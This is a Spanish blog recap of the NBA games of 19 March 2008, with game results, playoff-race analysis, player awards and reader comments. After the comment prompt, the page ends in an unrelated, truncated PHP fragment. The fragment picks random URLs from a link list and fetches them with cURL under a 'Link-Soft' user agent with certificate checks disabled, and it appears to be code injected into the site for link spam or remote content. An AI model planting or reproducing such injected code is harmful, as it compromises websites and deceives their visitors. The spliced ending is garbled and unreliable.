La crónica (19/03/2008)

20 de March de 2008 por MagicJohnson32

20 equipos jugaron anoche y son varias las conclusiones que pueden extraerse. Restan apenas 15 partidos (teniendo en cuenta a los líderes de Conferencia) y el panorama empieza a aclararse… o no, porque las batallas por la octava posición del Este y por el liderato del Oeste se presentan completamente igualadas. Hoy nuestra crónica está planteada en clave de análisis de situación.

Antes, el vídeo de resumen:

La crónica:

jamariodunksrickyLa noche dejó varios cadáveres, especialmente el de unos Heat cuya temporada es cada vez más miserable. Cuando pensábamos que ya habían tocado fondo, los de Miami añadieron otro capítulo a la serie de terror que está resultando este 2007-2008 e igualaron la tercera peor marca anotadora de la historia de la NBA desde la instauración del reloj de posesión (1954). Cayeron 54-96 en Toronto y nos permitieron ver la resurrección de Calderón, que en sólo 25 minutos logró 10 puntos, 10 asistencias, 5 rebotes y 4 robos. Poco tuvo que ver en la victoria el regreso de Chris Bosh, al que los Raptors han echado de menos y que está de vuelta para el tramo final de temporada. Toronto es quinto del Este, con sólo medio partido de ventaja sobre los Wizards y un partido sobre los Sixers, dos equipos al alza y que lo demostraron venciendo anoche respectivamente a Orlando, por 87-86, y a los Nuggets, por 113-115. En la particular ‘liga’ que disputan estos tres dwighthaywoodequipos, el que quedé último y ocupe la séptima posición del Este se enfrentará en primera ronda casi con toda seguridad a los Pistons; quien quedé segundo, y por tanto sea sexto de conferencia, se emparejará con los Magic; y quien se imponga y logre finalizar en la quinta posición jugará contra los Cavs. Por cierto, aunque no se encontrarían hasta unas hipotéticas Finales de Conferencia, los Cavs enviaron un mensaje anoche a los Pistons en forma de 73-89 con magníficas actuaciones de LeBron James e Ilgauskas.iversonhugcheeks

Pero estábamos hablando de los perdedores de la jornada, y los Nuggets son unos de los principales. El morbo de ver a Iverson de regreso a Philadelphia le sirvió de motivación a él, que logró 32 puntos y 8 asistencias, pero no a la defensa de Denver, que sigue desangrándose. La derrota ante los Sixers sale muy cara ya que los Warriors sí ganaron su partido en pista de los Clippers, 116-100, y los de George Karl ya están 2,5 partidos por detrás de los de Don Nelson. El calendario aún presenta dos enfrentamientos entre Nuggets y Warriors, por lo que no todo está perdido para Denver.

Entre los principales triunfadores de la noche se encuentran los Nets, no porque alcanzasen algún gran logro sino porque recuperaron la octava posición de la conferencia imponiéndose a los Hawks por 117-125. Resulta curiosa la transformación de Atlanta (probablemente a raíz de la llegada de Bibby), que ha pasado de ser uno de los equipos cuyos partidos tenían tanteos más bajos a, últimamente, garantizar muchos puntos. Anoche esto no le sirvió para ganar a unos Nets que tuvieron a sus tres estrellas, Harris, Carter y Jefferson, a pleno rendimiento (sumaron 98 puntos entre los tres).

bonzivsrocketsOtros que salieron muy reforzados fueron los Hornets; no sólo reforzados, sino también líderes de Conferencia. New Orleans venció a los Rockets por un claro 69-90, los relegó a la tercera plaza y empató con los Lakers en lo alto del Oeste. Chris Paul volvió a hacer de las suyas pero el factor sorpresa resultó Bonzi Wells, autor de 25 puntos con sabor a venganza. Por parte texana, el calendario a corto plazo se presenta complicado, con partidos anteshaqdunksonics Warriors, Suns y Spurs entre sus cinco compromisos antes de final de mes, por lo que necesitarán recuperar la confianza y el juego de un McGrady que acumula 14 de 48 en tiros en los tres últimos partidos.

Con una sola derrota más que los dos líderes del Oeste están los Suns, vencedores anoche por 110-98 ante los Sonics (quienes ya han alcanzado uno de sus propósitos: ser últimos de conferencia). Phoenix suma ya seis triunfos seguidos pero el calendario que espera es temible, con sólo tres partidos contra equipos sin opciones de jugar los Playoffs.

Por lo demás, la noche dejó la victoria sobre los Bobcats, por 95-102, de unos Pacers aún con posibilidades de jugar la postemporada (cosas del Este, que un equipo con menos del 40% de partidos ganados luche por el título) y la derrota 94-98 de los Grizzlies en un duelo por todo lo bajo ante los Wolves, quienes, de esta forma, han pasado de ser últimos de Conferencia a terceros por la cola, superados por Memphis y Sonics en esta penosa carrera por ascender posiciones cuando llegue el Draft.

Nuestro MVP: Era un partido fundamental y dio su mejor cara, con lo que el premio es para Vince Carter, autor de 39 puntos, 10 rebotes y 8 asistenciasvincehorford sin una sola pérdida en la victoria de los Nets sobre los Hawks. El premio se podría extender a sus compañeros Devin Harris y Richard Jeferson, también excepcionales anoche.

El rookie: En ese mismo partido, aunque en el lado de los perdedores, encontramos a uno de los habituales de este apartado. Al Horford sigue sumando méritos para optar al premio con 20 puntos sin apenas fallos, 15 rebotes y 6 asistencias. Son números de estrella, números de RoY.

La sorpresa: 26 minutos en cancha, 12 tiros de campo, 25 puntos, además de 3 tapones y 2 robos. Cuando Bonzi Wells está motivado puede ser un magnífico jugador, y los Rockets lo sufrieron anoche.

La decepción: Casi que ya no nos decepcionan pero el ridículo de los Heat los hacen acreedores del dudoso galardón. En el aspecto individual, nos decepcionó profundamente Dwight Howard, que no logró más que 1 canasta de 6 intentos, 3 puntos, 1 tapón y 4 pérdidas ante los Wizards. Cuando Brendan Haywood te supera de esta manera (10 puntos, 11 rebotes, 2 tapones) es para preocuparse.

El dato: en abril de 1999, los Bulls anotaron sólo 49 puntos, en la que todavía es la peor marca histórica desde que la NBA introdujo el reloj de posesión, en la temporada 54-55. La segunda peor anotación de un equipo fue por parte de los Nuggets, que se quedaron en 53 puntos ante los Pistons en 2002. En su partido de anoche, los Heat (quienes precisamente fueron el rival de los Bulls el día del récord) hicieron los peores registros en la historia de la franquicia en cuanto a puntos en un partido (54), en una mitad (26) y porcentaje de acierto (25,6%).

 

Comenta

5 comentarios a esta entrada

  1. Dantley dice:
    #1

    Vergonzoso lo de los Heat. Hay que tener un poco de dignidad. No sé si lo están haciendo a propósito, pero huele.

      Citar

  2. RusticoColorao dice:
    #2

    ¿Tenías que poner el dato de los bulls cabrón? Ainss…que tinieblas estamos viviendo.
    Por cierto, ¿la mejoría de Calderón tendrá que ver con la vuelta de Bosh? ¿Prefiere Bosh a Calderón?

      Citar

  3. telekoman dice:
    #3

    Yo creo que es evidente que Bosh prefiere a Calderón para su juego. El único problema de Calderón es que le falta tirar algo más.
    Lo de Miami es lamentable, pero eso ya lo sabían cuando tiraron la temporada.
    Lo del Oeste y las posiciones de playoff es todo un culebrón

      Citar

  4. MagicJohnson32 dice:
    #4

    La impresión ahora mismo es que los Playoffs del Este serán más bien aburridotes, porque cada vez hay más diferencia entre los 4 de arriba y el resto. En cambio los del Oeste son una tómbola. Rockets y Lakers tienen lesiones importantes, los Spurs parecen dormidos, Mavs y Suns generan dudas, los Jazz pierden mucho fuera de casa, los Warriors pueden desinflarse en cualquier momento y ceder su plaza a los Nuggets…

    Ves a saber.

    Pero qué bonito está.

      Citar

  5. MagicJohnson32 dice:
    #5

    Ah, hablaba sólo de la primera ronda de Playoffs, claro. El Celtics-Cavs que se presume en semis del Este puede ser grande.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>